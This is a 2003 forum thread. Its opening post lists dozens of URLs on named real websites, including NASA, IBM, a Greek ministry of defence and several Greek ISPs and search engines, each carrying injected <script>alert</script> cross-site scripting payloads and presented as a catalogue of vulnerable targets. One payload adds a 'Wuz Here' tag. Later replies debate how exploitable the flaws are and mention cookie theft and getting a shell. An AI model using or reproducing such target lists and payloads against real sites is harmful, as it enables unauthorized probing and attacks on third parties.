Xss!!!!!!
Results 1 to 6 of 6

Thread: Xss!!!!!!

  1. #1
    Junior Member
    Join Date
    Jul 2003
    Posts
    1

    Talking Xss!!!!!!

    Here there are some Vulnerable sites i found:

    We start with NASA.GOV

    http://search.nasa.gov/nasasearch/se...ubmitsearch.x=<script>alert("m")</script>&submitsearch.y=<script>alert("m")</script>

    http://search.nasa.gov/nasasearch/br...gory+Search.x=<script>alert("m")</script>&Category+Search.y=<script>alert("m")</script>

    And we go on with Fbi:

    hmmm what is this?

    http://www.firstgov.gov/fgsearch/ind...ubmit=+Search+


    w0w! INTERNAL server error

    http://www.firstgov.gov/fgsearch/index.jsp?dom=<script>alert("m")</script>&mw0=%3Cscript%3Ealert%28%22m%22%29%3C%2Fscript%3E&rn=218&in0=domain&parsed=true&Submit=Go&domain=fbi.gov

    http://www.firstgov.gov/fgsearch/index.jsp?dom0=<script>alert("m")</script>&mw0=%3Cscript%3Ealert%28%22m%22%29%3C%2Fscript%3E&rn=218&in0=domain&parsed=true&Submit=Go&domain=fbi.gov

    Ibm is also vulnerable:

    http://www.ibm.com/Search?v=11&lang=...t%3E&Search.x=<script>alert("m")</script>&Search.y=<script>alert("m")</script>

    www.opera.com
    In the search engine write: <script>alert("m")</script>

    http://www.business.com/search/rslt_...=&bdcf=&vt=all

    http://www.searchengineworld.com/
    --Write <script>alert("m")</script> in the e-mail address field


    http://www.crackfound.com/engine.cgi...9%3C/script%3E

    http://www.thebugs.ws/search.php?q=%...9%3C/script%3E

    http://www.ibm.com/Search?v=11&lang=...t%3E&Search.x=<script>alert("m")</script>&Search.y=<script>alert("m")</script>

    http://www.anubis.gr/Users/default.a...er&act=newUser

    http://www.pcmaster.gr/forum/default.asp?Action=Search


    Ministry of defence in Greece:
    http://www.mod.mil.gr/contact/all_ma...html?seclevel=<script>alert("m")</script>

    Hol (hellas on line ISP):

    http://search.hol.gr/advanced.asp?advanced=<script>alert("insane")</script)&c2=<script>alert("insane")</script)&o2=<script>alert("Dr_insane%20Wuz%20Here")</script)&ct=<script>alert("Dr_insane%20Wuz%20Here")</script)&q1=%3Cscript%3Ealert%28%22m%22%29%3C%2Fscript%29&searchlang=&q2=<script>alert("m")</script)&so=<script>alert("Dr_insane%20Wuz%20Here")</script)

    http://search.hol.gr/search.asp?ct=G...o.x=14&Go.y=16


    http://www.linuxfreaks.gr/

    http://www.findlink.gr/searching.asp?key=<script>alert("m")</script>&logic=any
    http://search.pathfinder.gr/search?q...ipt%3E&tab=web

    http://www.anazitisis.gr/cgi-bin/hts....x=5&search.y=<script>alert("m")</script>

    http://www.ditto.com/searchResults.a...t%3E&search.x=<script>alert("m")</script>&search.y=<script>alert("m")</script>

    http://promosearch.atomz.com/search/...8112&submit.x=<script>alert("m")</script>&submit.y=<script>alert("m")</script>

    http://www.askjeeves.com ****

    http://www.mixer.gr/cgi-bin/mxmeta?q...3C%2Fscript%3E
    http://www.robby.gr/search.rsp?searc...615407&parent=

    EOF

    /dr_insane
    dr_insane at pathfinder.gr

  2. #2
    Banned
    Join Date
    Apr 2003
    Posts
    3,840
    why dont you contact some of their webmasters and tell them their vulnebarities .....

  3. #3
    The Iceman Cometh
    Join Date
    Aug 2001
    Posts
    1,210
    Really quick, what makes you classify those as vulnerabilities? Yes, the these servers may contain vulnerabilities, but none of the links you posted are exploitable vulnerabilities. You're just passing a specific command into the search fields to give an internal server error. Doesn't appear to be anything special to me...

    AJ

  4. #4
    Leftie Linux Lover the_JinX's Avatar
    Join Date
    Nov 2001
    Location
    Beverwijk Netherlands
    Posts
    2,535
    some background info on XSS and what you can do with it..

    http://hotwired.lycos.com/webmonkey/00/18/index3a.html
    http://www.idefense.com/XSS.html
    http://www.cgisecurity.com/articles/xss-faq.shtml

    source: http://www.google.com/search?q=xss&ie=UTF-8&oe=UTF-8

    so yes.. it does mean they might be exploitable.. but it doesn't mean they are !!
    ASCII stupid question, get a stupid ANSI.
    When in Russia, pet a PETSCII.

    Get your ass over to SLAYRadio the best station for C64 Remixes !

  5. #5
    Junior Member
    Join Date
    Jun 2003
    Posts
    26
    well it depends of what you write in your script...
    you can also try in some asp/php forums or search engines to add more powerfull commands and even get yourself a shell in some method...

  6. #6
    Senior Member
    Join Date
    Sep 2001
    Posts
    1,027
    Do these urls require authenticated sessions to get to them? Is there anything of value protected by these sessions? Otherwise, I don't see much point in stealing cookies (which is pretty much all you can do with javascript xss) from search pages...

    Of course if the site was parsing asp or php or someother server side scripting this might be bad indeed...

    Ammo
    Credit travels up, blame travels down -- The Boss

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •